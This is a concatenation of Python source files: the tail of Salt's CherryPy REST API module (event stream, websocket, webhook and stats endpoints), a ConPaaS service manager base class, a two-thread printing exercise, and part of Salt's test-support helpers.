data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
'''
cookies = cherrypy.request.cookie
auth_token = token or salt_token or (
cookies['session_id'].value if 'session_id' in cookies else None)
if not self._is_valid_token(auth_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers['Content-Type'] = 'text/event-stream'
cherrypy.response.headers['Cache-Control'] = 'no-cache'
cherrypy.response.headers['Connection'] = 'keep-alive'
def listen():
'''
An iterator to yield Salt events
'''
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True)
yield u'retry: {0}\n'.format(400)
while True:
data = next(stream)
yield u'tag: {0}\n'.format(data.get('tag', ''))
yield u'data: {0}\n\n'.format(json.dumps(data))
return listen()
class WebsocketEndpoint(object):
    '''
    Open a WebSocket connection to Salt's event bus

    The event bus on the Salt master exposes a large variety of things, notably
    when executions are started on the master and also when minions ultimately
    return their results. This URL provides a real-time window into a running
    Salt infrastructure. Uses websocket as the transport mechanism.

    .. seealso:: :ref:`events`
    '''
    exposed = True

    _cp_config = dict(LowDataAdapter._cp_config, **{
        'response.stream': True,
        'tools.encode.encoding': 'utf-8',

        # Auth handled manually below
        'tools.salt_token.on': True,
        'tools.salt_auth.on': False,

        'tools.hypermedia_in.on': False,
        'tools.hypermedia_out.on': False,
        'tools.websocket.on': True,
        'tools.websocket.handler_cls': websockets.SynchronizingWebsocket,
    })

    def __init__(self):
        self.opts = cherrypy.config['saltopts']
        self.auth = salt.auth.LoadAuth(self.opts)

    def GET(self, token=None, **kwargs):
        '''
        Return a websocket connection of Salt's event stream

        .. http:get:: /ws/(token)

            :query format_events: The event stream will undergo server-side
                formatting if the ``format_events`` URL parameter is included
                in the request. This can be useful to avoid formatting on the
                client-side:

                .. code-block:: bash

                    curl -NsS <...snip...> localhost:8000/ws?format_events

            :reqheader X-Auth-Token: an authentication token from
                :py:class:`~Login`.

            :status 101: switching to the websockets protocol
            :status 401: |401|
            :status 406: |406|

        An authentication token **may optionally** be passed as part of the URL
        for browsers that cannot be configured to send the authentication
        header or cookie:

        .. code-block:: bash

            curl -NsS <...snip...> localhost:8000/ws/ffedf49d

        Clients activate real-time updates from Salt's event stream by
        signaling ``websocket client ready`` once the connection is open.
        '''
        # Pulling the session token from an URL param is a workaround for
        # browsers not supporting CORS in the EventSource API.
        if token:
            orig_sesion, _ = cherrypy.session.cache.get(token, ({}, None))
            salt_token = orig_sesion.get('token')
        else:
            salt_token = cherrypy.session.get('token')

        # Manually verify the token
        if not salt_token or not self.auth.get_tok(salt_token):
            raise cherrypy.HTTPError(401)

        # Release the session lock before starting the long-running response
        cherrypy.session.release_lock()

        # A handler is the server side end of the websocket connection. Each
        # request spawns a new instance of this handler
        handler = cherrypy.request.ws_handler

        def event_stream(handler, pipe):
            '''
            An iterator to return Salt events (and optionally format them)
            '''
            # blocks until send is called on the parent end of this pipe.
            pipe.recv()

            event = salt.utils.event.get_event(
                'master',
                sock_dir=self.opts['sock_dir'],
                transport=self.opts['transport'],
                opts=self.opts,
                listen=True)
            stream = event.iter_events(full=True)
            SaltInfo = event_processor.SaltInfo(handler)
            while True:
                data = next(stream)
                if data:
                    try:  # work around try to decode catch unicode errors
                        if 'format_events' in kwargs:
                            # Server-side formatting requested by the client.
                            SaltInfo.process(data, salt_token, self.opts)
                        else:
                            # Raw pass-through: one SSE-style record per event.
                            handler.send('data: {0}\n\n'.format(
                                json.dumps(data)), False)
                    except UnicodeDecodeError:
                        logger.error(
                            "Error: Salt event has non UTF-8 data:\n{0}"
                            .format(data))
                time.sleep(0.1)

        parent_pipe, child_pipe = Pipe()
        handler.pipe = parent_pipe
        handler.opts = self.opts
        # Process to handle async push to a client.
        # Each GET request causes a process to be kicked off.
        # NOTE(review): the child process is never joined or terminated in
        # this method; presumably the websocket handler tears it down when
        # the connection closes -- confirm.
        proc = Process(target=event_stream, args=(handler, child_pipe))
        proc.start()
class Webhook(object):
    '''
    A generic web hook entry point that fires an event on Salt's event bus

    External services can POST data to this URL to trigger an event in Salt.
    For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.

    .. note:: Be mindful of security

        Salt's Reactor can run any code. A Reactor SLS that responds to a hook
        event is responsible for validating that the event came from a trusted
        source and contains valid data.

        **This is a generic interface and securing it is up to you!**

        This URL requires authentication however not all external services can
        be configured to authenticate. For this reason authentication can be
        selectively disabled for this URL. Follow best practices -- always use
        SSL, pass a secret key, configure the firewall to only allow traffic
        from a known source, etc.

    The event data is taken from the request body. The
    :mailheader:`Content-Type` header is respected for the payload.

    The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
    appended to the end. For example, a ``POST`` request sent to
    ``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
    ``salt/netapi/hook/mycompany/myapp/mydata``.

    .. seealso:: :ref:`events`, :ref:`reactor`
    '''
    exposed = True
    # Fixed prefix of every event tag fired from this endpoint.
    tag_base = ['salt', 'netapi', 'hook']

    _cp_config = dict(LowDataAdapter._cp_config, **{
        # Don't do any lowdata processing on the POST data
        'tools.lowdata_fmt.on': True,

        # Auth can be overridden in __init__().
        'tools.salt_token.on': True,
        'tools.salt_auth.on': True,
    })

    def __init__(self):
        self.opts = cherrypy.config['saltopts']
        # Fire-only (non-listening) handle on the master event bus.
        self.event = salt.utils.event.get_event(
            'master',
            sock_dir=self.opts['sock_dir'],
            transport=self.opts['transport'],
            opts=self.opts,
            listen=False)

        if cherrypy.config['apiopts'].get('webhook_disable_auth'):
            # NOTE(review): this item-assignment mutates the class-level
            # _cp_config dict through the instance reference, so auth is
            # disabled for every Webhook instance -- confirm intended.
            self._cp_config['tools.salt_token.on'] = False
            self._cp_config['tools.salt_auth.on'] = False

    def POST(self, *args, **kwargs):
        '''
        Fire an event in Salt with a custom event tag and data

        .. http:post:: /hook

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|
            :status 413: request body is too large

        **Example request:**

        .. code-block:: bash

            curl -sS localhost:8000/hook -d foo='Foo!' -d bar='Bar!'

        **Example response**:

        .. code-block:: http

            HTTP/1.1 200 OK
            Content-Length: 14
            Content-Type: application/json

            {"success": true}

        The fired event carries the raw request body, the unserialized POST
        data, and the request headers, so a Reactor SLS can validate a secret
        header before acting on the hook.
        '''
        # Tag is the fixed prefix plus the remaining URL path segments.
        tag = '/'.join(itertools.chain(self.tag_base, args))
        data = cherrypy.serving.request.unserialized_data
        raw_body = cherrypy.serving.request.raw_body
        headers = dict(cherrypy.request.headers)
        ret = self.event.fire_event({
            'body': raw_body,
            'post': data,
            'headers': headers,
        }, tag)
        return {'success': ret}
class Stats(object):
    '''
    Expose statistics on the running CherryPy server
    '''
    exposed = True

    _cp_config = dict(LowDataAdapter._cp_config, **{
        'tools.salt_token.on': True,
        'tools.salt_auth.on': True,
    })

    def GET(self):
        '''
        Return a dump of statistics collected from the CherryPy server

        .. http:get:: /stats

            :reqheader X-Auth-Token: |req_token|
            :reqheader Accept: |req_accept|

            :resheader Content-Type: |res_ct|

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|
        '''
        # CherryPy's cpstats tool hangs its counters off the stdlib logging
        # module; the attribute is absent when stats collection is disabled.
        if hasattr(logging, 'statistics'):
            return cpstats.extrapolate_statistics(logging.statistics)

        return {}
class App(object):
    '''
    Class to serve HTML5 apps
    '''
    exposed = True

    def GET(self, *args):
        '''
        Serve a single static file ignoring the remaining path

        This is useful in combination with a browser-based app using the HTML5
        history API.

        .. http::get:: /app

            :reqheader X-Auth-Token: |req_token|

            :status 200: |200|
            :status 401: |401|
        '''
        # Whatever sub-path was requested, always serve the configured app
        # entry point; client-side routing handles the rest of the path.
        apiopts = cherrypy.config['apiopts']
        return cherrypy.lib.static.serve_file(apiopts['app'])
class API(object):
    '''
    Collect configuration and URL map for building the CherryPy app
    '''
    # Static URL-to-handler map; extended at runtime by _update_url_map().
    # NOTE(review): this dict is a class attribute, so the updates made in
    # _update_url_map() persist across API instances -- confirm intended.
    url_map = {
        'index': LowDataAdapter,
        'login': Login,
        'logout': Logout,
        'minions': Minions,
        'run': Run,
        'jobs': Jobs,
        'keys': Keys,
        'events': Events,
        'stats': Stats,
    }

    def _setattr_url_map(self):
        '''
        Set an attribute on the local instance for each key/val in url_map

        CherryPy uses class attributes to resolve URLs.
        '''
        for url, cls in six.iteritems(self.url_map):
            setattr(self, url, cls())

    def _update_url_map(self):
        '''
        Assemble any dynamic or configurable URLs
        '''
        if HAS_WEBSOCKETS:
            self.url_map.update({
                'ws': WebsocketEndpoint,
            })

        # Allow the Webhook URL to be overridden from the conf.
        self.url_map.update({
            self.apiopts.get('webhook_url', 'hook').lstrip('/'): Webhook,
        })

        # Enable the single-page JS app URL.
        if 'app' in self.apiopts:
            self.url_map.update({
                self.apiopts.get('app_path', 'app').lstrip('/'): App,
            })

    def __init__(self):
        self.opts = cherrypy.config['saltopts']
        self.apiopts = cherrypy.config['apiopts']
        self._update_url_map()
        self._setattr_url_map()

    def get_conf(self):
        '''
        Combine the CherryPy configuration with the rest_cherrypy config values
        pulled from the master config and return the CherryPy configuration
        '''
        conf = {
            'global': {
                'server.socket_host': self.apiopts.get('host', '0.0.0.0'),
                'server.socket_port': self.apiopts.get('port', 8000),
                'server.thread_pool': self.apiopts.get('thread_pool', 100),
                'server.socket_queue_size': self.apiopts.get('queue_size', 30),
                'engine.timeout_monitor.on': self.apiopts.get(
                    'expire_responses', True),
                'max_request_body_size': self.apiopts.get(
                    'max_request_body_size', 1048576),
                'debug': self.apiopts.get('debug', False),
            },
            '/': {
                'request.dispatch': cherrypy.dispatch.MethodDispatcher(),

                'tools.trailing_slash.on': True,
                'tools.gzip.on': True,

                'tools.cpstats.on': self.apiopts.get('collect_stats', False),

                'tools.html_override.on': True,
                'tools.cors_tool.on': True,
            },
        }

        if 'favicon' in self.apiopts:
            conf['/favicon.ico'] = {
                'tools.staticfile.on': True,
                'tools.staticfile.filename': self.apiopts['favicon'],
            }

        # Production environment silences CherryPy tracebacks and autoreload.
        if self.apiopts.get('debug', False) is False:
            conf['global']['environment'] = 'production'

        # Serve static media if the directory has been set in the configuration
        if 'static' in self.apiopts:
            conf[self.apiopts.get('static_path', '/static')] = {
                'tools.staticdir.on': True,
                'tools.staticdir.dir': self.apiopts['static'],
            }

        # Add to global config
        cherrypy.config.update(conf['global'])

        return conf
def get_app(opts):
    '''
    Returns a WSGI app and a configuration dictionary

    :param opts: the Salt master configuration dictionary; the section named
        after this module (``rest_cherrypy``) provides the salt-api options.
    :return: a ``(root, apiopts, cpyopts)`` tuple -- the CherryPy app object,
        the salt-api options, and the assembled CherryPy configuration.
    '''
    # The module path's second-to-last component is the config section name
    # for this netapi module ('rest_cherrypy').
    section = __name__.rsplit('.', 2)[-2]
    api_config = opts.get(section, {})

    # Add Salt and salt-api config options to the main CherryPy config dict
    cherrypy.config['saltopts'] = opts
    cherrypy.config['apiopts'] = api_config

    app_root = API()  # cherrypy app
    return app_root, api_config, app_root.get_conf()
|
manager.py | # -*- coding: utf-8 -*-
"""
conpaas.core.manager
====================
ConPaaS core: service-independent manager code.
:copyright: (C) 2010-2013 by Contrail Consortium.
"""
from threading import Thread
import time
import os.path
import libcloud
from conpaas.core.log import create_logger
from conpaas.core.expose import expose
from conpaas.core.controller import Controller
from conpaas.core.https.server import HttpJsonResponse
from conpaas.core.https.server import HttpErrorResponse
from conpaas.core.https.server import FileUploadField
from conpaas.core import ipop
from conpaas.core.ganglia import ManagerGanglia
class BaseManager(object):
    """Manager class with the following exposed methods:

    startup() -- POST
    getLog() -- GET
    upload_startup_script() -- UPLOAD
    get_startup_script() -- GET
    """
    # Manager states
    S_INIT = 'INIT'  # manager initialized but not yet started
    S_PROLOGUE = 'PROLOGUE'  # manager is starting up
    S_RUNNING = 'RUNNING'  # manager is running
    S_ADAPTING = 'ADAPTING'  # manager is in a transient state - frontend will
    # keep polling until manager out of transient state
    S_EPILOGUE = 'EPILOGUE'  # manager is shutting down
    S_STOPPED = 'STOPPED'  # manager stopped
    S_ERROR = 'ERROR'  # manager is in error state

    # String template for error messages returned when performing actions in
    # the wrong state
    WRONG_STATE_MSG = "ERROR: cannot perform %(action)s in state %(curstate)s"

    # String template for error messages returned when a required argument is
    # missing
    REQUIRED_ARG_MSG = "ERROR: %(arg)s is a required argument"

    # String template for debugging messages logged on nodes creation
    ACTION_REQUESTING_NODES = "requesting %(count)s nodes in %(action)s"

    # TCP port the service agents listen on.
    AGENT_PORT = 5555

    def __init__(self, config_parser):
        """Initialize logging, the cloud controller, IPOP and Ganglia.

        :param config_parser: ConfigParser whose 'manager' section provides
            at least LOG_FILE (and CONPAAS_HOME for script uploads).
        """
        self.logger = create_logger(__name__)
        self.logger.debug('Using libcloud version %s' % libcloud.__version__)
        self.controller = Controller(config_parser)
        self.logfile = config_parser.get('manager', 'LOG_FILE')
        self.config_parser = config_parser
        self.state = self.S_INIT
        # Volumes created through create_volume(); used by get_volume().
        self.volumes = []

        # IPOP setup
        ipop.configure_conpaas_node(config_parser)

        # Ganglia setup
        self.ganglia = ManagerGanglia(config_parser)

        try:
            self.ganglia.configure()
        except Exception, err:
            # Monitoring is best-effort: a configure failure disables Ganglia
            # but does not abort manager initialization (early return skips
            # only the start() step below).
            self.logger.exception('Error configuring Ganglia: %s' % err)
            self.ganglia = None
            return

        # start() reports failure via a returned error value, not by raising.
        err = self.ganglia.start()
        if err:
            self.logger.exception(err)
            self.ganglia = None
        else:
            self.logger.info('Ganglia started successfully')

    @expose('POST')
    def startup(self, kwargs):
        """Start the given service"""
        # Starting up the service makes sense only in the INIT or STOPPED
        # states
        if self.state != self.S_INIT and self.state != self.S_STOPPED:
            vals = {'curstate': self.state, 'action': 'startup'}
            return HttpErrorResponse(self.WRONG_STATE_MSG % vals)

        # Check if the specified cloud, if any, is available
        if 'cloud' in kwargs:
            try:
                self._init_cloud(kwargs['cloud'])
            except Exception:
                return HttpErrorResponse(
                    "A cloud named '%s' could not be found" % kwargs['cloud'])

        self.logger.info('Manager starting up')

        self.state = self.S_PROLOGUE
        # _do_startup is implemented by the service-specific subclass; it runs
        # in the background while the HTTP response is returned immediately.
        Thread(target=self._do_startup, kwargs=kwargs).start()

        return HttpJsonResponse({'state': self.state})

    @expose('GET')
    def getLog(self, kwargs):
        """Return logfile"""
        try:
            return HttpJsonResponse({'log': open(self.logfile).read()})
        except:
            # Any failure (missing file, permissions, ...) is reported as a
            # generic error to the client.
            return HttpErrorResponse('Failed to read log')

    def upload_script(self, kwargs, filename):
        """Write the file uploaded in kwargs['script'] to filesystem.

        Return the script absoulte path on success, HttpErrorResponse on
        failure.
        """
        self.logger.debug("upload_script: called with filename=%s" % filename)

        # Check if the required argument 'script' is present
        if 'script' not in kwargs:
            return HttpErrorResponse(ManagerException(
                ManagerException.E_ARGS_MISSING, 'script').message)

        script = kwargs.pop('script')

        # Check if any trailing parameter has been submitted
        if len(kwargs) != 0:
            return HttpErrorResponse(ManagerException(
                ManagerException.E_ARGS_UNEXPECTED, kwargs.keys()).message)

        # Script has to be a FileUploadField
        if not isinstance(script, FileUploadField):
            return HttpErrorResponse(ManagerException(
                ManagerException.E_ARGS_INVALID,
                detail='script should be a file'
            ).message)

        basedir = self.config_parser.get('manager', 'CONPAAS_HOME')
        fullpath = os.path.join(basedir, filename)

        # Write the uploaded script to filesystem
        open(fullpath, 'w').write(script.file.read())

        self.logger.debug("upload_script: script uploaded successfully to '%s'"
                          % fullpath)

        # Return the script absolute path
        return fullpath

    @expose('UPLOAD')
    def upload_startup_script(self, kwargs):
        """Store the uploaded script as startup.sh and refresh the VM context."""
        ret = self.upload_script(kwargs, 'startup.sh')

        if type(ret) is HttpErrorResponse:
            # Something went wrong. Return the error
            return ret

        # Rebuild context script
        self.controller.generate_context("web")

        # All is good. Return the filename of the uploaded script
        return HttpJsonResponse({'filename': ret})

    @expose('GET')
    def get_startup_script(self, kwargs):
        """Return contents of the currently defined startup script, if any"""
        basedir = self.config_parser.get('manager', 'CONPAAS_HOME')
        fullpath = os.path.join(basedir, 'startup.sh')

        try:
            return HttpJsonResponse(open(fullpath).read())
        except IOError:
            return HttpErrorResponse('No startup script')

    def create_volume(self, size, name, vm_id, cloud=None):
        """Create a volume and register it in self.volumes.

        :param size: volume size in MBs
        :param name: volume name
        :param vm_id: id of the VM the volume will be attached to
        :param cloud: target cloud; None means the controller's default cloud
        """
        self.logger.info('Creating a volume named %s (%s MBs)' % (
            name, size))

        # If cloud is None, the controller will create this volume on the
        # default cloud
        volume = self.controller.create_volume(size, name, vm_id, cloud)

        # Keep track of the cloud this volume has been created on
        volume.cloud = cloud

        # Keep track of this volume
        self.volumes.append(volume)

        return volume

    def get_volume(self, volume_id):
        """Return the tracked volume with the given id; raise if unknown."""
        for vol in self.volumes:
            if volume_id == vol.id:
                return vol

        known_volumes = [vol.id for vol in self.volumes]
        raise Exception("Volume '%s' not found. Known volumes: %s" %
                        (volume_id, known_volumes))

    def destroy_volume(self, volume_id):
        """Destroy the volume with the given id, retrying on failure.

        Unknown volume ids are ignored (logged and returned); a known volume
        that cannot be destroyed raises an Exception.
        """
        self.logger.info("Destroying volume with id %s" % volume_id)

        try:
            volume = self.get_volume(volume_id)
        except Exception:
            self.logger.info("Volume %s not known" % volume_id)
            return

        for attempt in range(1, 11):
            try:
                ret = self.controller.destroy_volume(volume, volume.cloud)
            except Exception, err:
                self.logger.info("Attempt %s: %s" % (attempt, err))
                # It might take a bit for the volume to actually be
                # detached. Let's wait a little and try again.
                time.sleep(10)

        # NOTE(review): there is no break on success, so destroy_volume is
        # invoked on every one of the 10 attempts; and if *every* attempt
        # raises, 'ret' is unbound here and this line raises NameError
        # instead of the intended Exception -- confirm intended behavior.
        if ret:
            self.volumes.remove(volume)
        else:
            raise Exception("Error destroying volume %s" % volume_id)

    def attach_volume(self, volume_id, vm_id, device_name):
        """Attach a tracked volume to the given VM as device_name."""
        self.logger.info("Attaching volume %s to VM %s as %s" % (volume_id,
                         vm_id, device_name))
        volume = self.get_volume(volume_id)

        # Ad-hoc object: the controller only needs something with an 'id'
        # attribute to identify the target node.
        class node:
            id = vm_id

        return self.controller.attach_volume(node, volume, device_name,
                                             volume.cloud)

    def detach_volume(self, volume_id):
        """Detach a tracked volume from its VM; returns the controller result."""
        self.logger.info("Detaching volume %s..." % volume_id)
        volume = self.get_volume(volume_id)
        ret = self.controller.detach_volume(volume, volume.cloud)
        self.logger.info("Volume %s detached" % volume_id)
        return ret

    def _init_cloud(self, cloud):
        """Resolve a cloud name to a controller cloud object.

        The name 'default' is an alias for the 'iaas' cloud.
        """
        if cloud == 'default':
            cloud = 'iaas'
        return self.controller.get_cloud_by_name(cloud)
class ManagerException(Exception):
    """Service-manager error carrying a numeric code and a formatted message.

    The message template is selected from E_STRINGS by ``code`` and filled
    with ``args``; an optional ``detail`` keyword argument is appended as
    ``DETAIL:<detail>``.
    """

    E_CONFIG_READ_FAILED = 0
    E_CONFIG_COMMIT_FAILED = 1
    E_ARGS_INVALID = 2
    E_ARGS_UNEXPECTED = 3
    E_ARGS_MISSING = 4
    E_IAAS_REQUEST_FAILED = 5
    E_STATE_ERROR = 6
    E_CODE_VERSION_ERROR = 7
    E_NOT_ENOUGH_CREDIT = 8
    E_UNKNOWN = 9

    # Message templates, indexed by the error codes above.
    E_STRINGS = [
        'Failed to read configuration',
        'Failed to commit configuration',
        'Invalid arguments',
        'Unexpected arguments %s',  # 1 param (a list)
        'Missing argument "%s"',  # 1 param
        'Failed to request resources from IAAS',
        'Cannot perform requested operation in current state',
        'No code version selected',
        'Not enough credits',
        'Unknown error',
    ]

    def __init__(self, code, *args, **kwargs):
        self.code = code
        self.args = args
        formatted = self.E_STRINGS[code] % args
        # 'detail' is appended only when explicitly supplied, so that a
        # caller passing detail=None still gets the DETAIL suffix.
        if 'detail' in kwargs:
            self.message = '%s DETAIL:%s' % (formatted, str(kwargs['detail']))
        else:
            self.message = formatted
|
important_exercise.py | """
Use two threads:
one prints the 52 numbers 1-52,
the other prints the letters A-Z.
The two threads run concurrently, and the required output order is
1 2 A 3 4 B ... 51 52 Z
(a common written interview exercise)
"""
from threading import Lock, Thread
import time
lock01 = Lock()
lock02 = Lock()
def print_int():
    """Print 1..52, two numbers per turn.

    lock01 gates this thread's turn; releasing lock02 hands the turn to the
    letter-printing thread.
    """
    number = 1
    while number <= 51:
        lock01.acquire()
        print(number)
        print(number + 1)
        lock02.release()
        number += 2
def print_alpha():
    """Print the uppercase letters A..Z, one per turn.

    lock02 gates this thread's turn; releasing lock01 hands the turn back to
    the number-printing thread.
    """
    for letter in map(chr, range(ord('A'), ord('Z') + 1)):
        lock02.acquire()
        print(letter)
        lock01.release()
t1 = Thread(target=print_alpha)
t2 = Thread(target=print_int)
# Hold lock02 before starting either thread so the letter thread cannot run
# until the number thread releases lock02 after its first pair of numbers.
lock02.acquire()
t2.start()
t1.start()
|
helpers.py | # -*- coding: utf-8 -*-
'''
:copyright: Copyright 2013-2017 by the SaltStack Team, see AUTHORS for more details.
:license: Apache 2.0, see LICENSE for more details.
tests.support.helpers
~~~~~~~~~~~~~~~~~~~~~
Test support helpers
'''
# pylint: disable=repr-flag-used-in-string,wrong-import-order
# Import Python libs
from __future__ import absolute_import, print_function, unicode_literals
import base64
import errno
import functools
import inspect
import logging
import os
import random
import shutil
import signal
import socket
import string
import subprocess
import sys
import tempfile
import textwrap
import threading
import time
import tornado.ioloop
import tornado.web
import types
# Import 3rd-party libs
import psutil # pylint: disable=3rd-party-module-not-gated
from salt.ext import six
from salt.ext.six.moves import range, builtins # pylint: disable=import-error,redefined-builtin
try:
    from pytestsalt.utils import get_unused_localhost_port  # pylint: disable=unused-import
except ImportError:
    def get_unused_localhost_port():
        '''
        Return a random unused port on localhost
        '''
        # Binding to port 0 makes the kernel pick a free ephemeral port;
        # read it back from the socket before closing.
        probe = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
        probe.bind(('127.0.0.1', 0))
        free_port = probe.getsockname()[1]
        probe.close()
        return free_port
# Import Salt Tests Support libs
from tests.support.unit import skip, _id
from tests.support.mock import patch
from tests.support.paths import FILES, TMP
# Import Salt libs
import salt.utils.files
import salt.utils.platform
import salt.utils.stringutils
if salt.utils.platform.is_windows():
import salt.utils.win_functions
else:
import pwd
log = logging.getLogger(__name__)
HAS_SYMLINKS = None
def no_symlinks():
    '''
    Check if git is installed and has symlinks enabled in the configuration.

    Returns True when symlink-based tests should be skipped: git is missing
    or ``core.symlinks`` is not set to ``true``. The probe result is cached
    in the module-level ``HAS_SYMLINKS`` flag so git is invoked only once.
    '''
    global HAS_SYMLINKS
    if HAS_SYMLINKS is not None:
        return not HAS_SYMLINKS

    output = ''
    try:
        output = subprocess.Popen(
            ['git', 'config', '--get', 'core.symlinks'],
            cwd=TMP,
            stdout=subprocess.PIPE).communicate()[0]
    except OSError as exc:
        # git not being installed at all is expected; re-raise anything else.
        if exc.errno != errno.ENOENT:
            raise
    except subprocess.CalledProcessError:
        # git returned non-zero status
        pass

    # communicate() returns bytes on Python 3 and str on Python 2; comparing
    # only against the str 'true' could never match on Python 3, so this
    # check accepts both.
    HAS_SYMLINKS = output.strip() in ('true', b'true')
    return not HAS_SYMLINKS
def destructiveTest(caller):
    '''
    Mark a test case as a destructive test for example adding or removing users
    from your system.

    .. code-block:: python

        class MyTestCase(TestCase):

            @destructiveTest
            def test_create_user(self):
                pass
    '''
    if inspect.isclass(caller):
        # Decorating a whole TestCase class: install (or wrap) setUp so that
        # every test in the class is skipped when destructive tests are off.
        original_setup = getattr(caller, 'setUp', None)

        def setUp(self, *args, **kwargs):
            if os.environ.get('DESTRUCTIVE_TESTS', 'False').lower() == 'false':
                self.skipTest('Destructive tests are disabled')
            if original_setup is not None:
                original_setup(self, *args, **kwargs)

        caller.setUp = setUp
        return caller

    # Decorating a single test function/method.
    @functools.wraps(caller)
    def wrap(cls):
        if os.environ.get('DESTRUCTIVE_TESTS', 'False').lower() == 'false':
            cls.skipTest('Destructive tests are disabled')
        return caller(cls)
    return wrap
def expensiveTest(caller):
    '''
    Mark a test case as an expensive test, for example, a test which can cost
    money(Salt's cloud provider tests).

    .. code-block:: python

        class MyTestCase(TestCase):

            @expensiveTest
            def test_create_user(self):
                pass
    '''
    if inspect.isclass(caller):
        # Decorating a whole TestCase class: install (or wrap) setUp so that
        # every test in the class is skipped when expensive tests are off.
        original_setup = getattr(caller, 'setUp', None)

        def setUp(self, *args, **kwargs):
            if os.environ.get('EXPENSIVE_TESTS', 'False').lower() == 'false':
                self.skipTest('Expensive tests are disabled')
            if original_setup is not None:
                original_setup(self, *args, **kwargs)

        caller.setUp = setUp
        return caller

    # Decorating a single test function/method.
    @functools.wraps(caller)
    def wrap(cls):
        if os.environ.get('EXPENSIVE_TESTS', 'False').lower() == 'false':
            cls.skipTest('Expensive tests are disabled')
        return caller(cls)
    return wrap
def flaky(caller=None, condition=True, attempts=4):
    '''
    Mark a test as flaky. The test will be retried, looking for a successful
    run: an immediate second try, then a polynomial backoff (attempt**2
    seconds) between the remaining attempts.

    .. code-block:: python

        class MyTestCase(TestCase):

            @flaky
            def test_sometimes_works(self):
                pass
    '''
    # Used with keyword arguments only, e.g. @flaky(attempts=8): return a
    # decorator pre-bound to those arguments.
    if caller is None:
        return functools.partial(flaky, condition=condition, attempts=attempts)

    # A false condition (literal or callable) disables the wrapping entirely.
    if condition is False:
        return caller
    if callable(condition) and condition() is False:
        return caller

    if inspect.isclass(caller):
        # Decorating a class: wrap each test_* function/method individually.
        for attrname in [n for n in dir(caller) if n.startswith('test_')]:
            try:
                member = getattr(caller, attrname)
                if inspect.isfunction(member) or inspect.ismethod(member):
                    setattr(caller, attrname,
                            flaky(caller=member, condition=condition, attempts=attempts))
            except Exception as exc:
                log.exception(exc)
                continue
        return caller

    @functools.wraps(caller)
    def wrap(cls):
        final_attempt = attempts - 1
        for attempt in range(attempts):
            try:
                return caller(cls)
            except Exception as exc:
                if attempt >= final_attempt:
                    raise exc
                backoff_time = attempt ** 2
                log.info(
                    'Found Exception. Waiting %s seconds to retry.',
                    backoff_time
                )
                time.sleep(backoff_time)
        return cls
    return wrap
def requires_sshd_server(caller):
    '''
    Mark a test as requiring the tests SSH daemon running.

    .. code-block:: python

        class MyTestCase(TestCase):

            @requiresSshdServer
            def test_create_user(self):
                pass
    '''
    if inspect.isclass(caller):
        # Decorating a whole TestCase class: install (or wrap) setUp so that
        # every test in the class is skipped when the SSH daemon is not up.
        original_setup = getattr(caller, 'setUp', None)

        def setUp(self, *args, **kwargs):
            if os.environ.get('SSH_DAEMON_RUNNING', 'False').lower() == 'false':
                self.skipTest('SSH tests are disabled')
            if original_setup is not None:
                original_setup(self, *args, **kwargs)

        caller.setUp = setUp
        return caller

    # Decorating a single test function/method.
    @functools.wraps(caller)
    def wrap(cls):
        if os.environ.get('SSH_DAEMON_RUNNING', 'False').lower() == 'false':
            cls.skipTest('SSH tests are disabled')
        return caller(cls)
    return wrap
class RedirectStdStreams(object):
    '''
    Temporarily redirect system output to file like objects.

    Default is to redirect to `os.devnull`, which just mutes output, `stdout`
    and `stderr`.
    '''

    def __init__(self, stdout=None, stderr=None):
        # Late import
        import salt.utils.files
        if stdout is None:
            stdout = salt.utils.files.fopen(os.devnull, 'w')  # pylint: disable=resource-leakage
        if stderr is None:
            stderr = salt.utils.files.fopen(os.devnull, 'w')  # pylint: disable=resource-leakage

        self.__stdout = stdout
        self.__stderr = stderr
        self.__redirected = False
        # Patches sys.stdout/sys.stderr in place; started in redirect(),
        # stopped in unredirect().
        self.patcher = patch.multiple(sys, stderr=self.__stderr, stdout=self.__stdout)

    def __enter__(self):
        self.redirect()
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        self.unredirect()

    def redirect(self):
        '''Flush the real streams, then swap in the replacement streams.'''
        self.old_stdout = sys.stdout
        self.old_stdout.flush()
        self.old_stderr = sys.stderr
        self.old_stderr.flush()
        self.patcher.start()
        self.__redirected = True

    def unredirect(self):
        '''Close the replacement streams and restore the originals.

        Safe to call when no redirection is active (no-op).
        '''
        if not self.__redirected:
            return
        try:
            self.__stdout.flush()
            self.__stdout.close()
        except ValueError:
            # already closed?
            pass
        try:
            self.__stderr.flush()
            self.__stderr.close()
        except ValueError:
            # already closed?
            pass

        self.patcher.stop()

    def flush(self):
        '''Best-effort flush of the replacement streams while redirected.'''
        if self.__redirected:
            try:
                self.__stdout.flush()
            except Exception:
                pass
            try:
                self.__stderr.flush()
            except Exception:
                pass
class TestsLoggingHandler(object):
    '''
    Simple logging handler which can be used to test if certain logging
    messages get emitted or not:
    .. code-block:: python
        with TestsLoggingHandler() as handler:
            # (...) Do what ever you wish here
            handler.messages    # here are the emitted log messages
    '''

    def __init__(self, level=0, format='%(levelname)s:%(message)s'):
        self.level = level
        self.format = format
        self.activated = False
        self.prev_logging_level = None

    def activate(self):
        class _RecordingHandler(logging.Handler):
            # Stores every formatted record on ``messages`` instead of
            # writing it anywhere.
            def __init__(self, level):
                logging.Handler.__init__(self, level)
                self.messages = []

            def emit(self, record):
                self.messages.append(self.format(record))

        self.handler = _RecordingHandler(self.level)
        self.handler.setFormatter(logging.Formatter(self.format))
